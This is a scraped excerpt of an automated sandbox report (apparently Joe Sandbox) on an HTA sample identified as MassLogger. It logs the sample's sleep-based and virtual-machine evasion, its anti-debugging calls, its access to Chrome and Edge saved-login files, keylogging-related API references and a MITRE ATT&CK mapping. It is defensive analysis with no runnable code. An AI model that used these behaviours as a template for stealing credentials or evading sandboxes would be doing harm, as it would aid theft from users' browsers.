Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -599327s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -598999s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -597956s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -597718s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -597577s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -597433s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -597039s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -596880s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -596421s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -595313s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -595188s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -594967s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -594858s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -594749s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -594482s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -594364s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -594080s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -593953s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -593837s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: daphpvwO.pif, 0000000B.00000002.3828021890.000000002751F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU u
Source: powershell.exe, 00000003.00000002.1522620204.0000000008427000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1522620204.00000000084B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1522620204.00000000084B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: powershell.exe, 00000003.00000002.1523264828.00000000084DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: powershell.exe, 00000003.00000002.1476213571.00000000031CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1511309376.000000000752C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vcc.exe, 00000006.00000002.1465421810.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\vcc.exe	API call chain: ExitProcess graph end node			graph_6-25749
Source: C:\Users\user\Links\daphpvwO.pif	API call chain: ExitProcess graph end node			graph_11-55050

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0040CE09
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0040E61C
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00416F6A
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_004123F1 SetUnhandledExceptionFilter,	11_2_004123F1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report niceworkingskilldevelopedwithgreatnews.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
niceworkingskilldevelopedwithgreatnews.hta

Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: daphpvwO.pif, 0000000B.00000002.3831052027.000000002D5DE000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: _-Program Manager
Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerPrXtM'
Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerMaXtM'
Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerXtM'LR
Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerXtM'
Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager,
Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerMaXtM'LR
Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\

Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	6_2_028854BC
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: GetLocaleInfoA,	6_2_0288A0B8
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: GetLocaleInfoA,	6_2_0288A104
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	6_2_028855C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: GetLocaleInfoA,	11_2_00417A20

Source: Yara match	File source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: daphpvwO.pif PID: 3320, type: MEMORYSTR

Source: C:\Users\user\Links\daphpvwO.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Valid Accounts	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	112 Command and Scripting Interpreter	Logon Script (Windows)	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	11 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	312 Process Injection	4 Software Packing	NTDS	27 System Information Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	241 Security Software Discovery	SSH	Keylogging	24 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	41 Virtualization/Sandbox Evasion	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	312 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption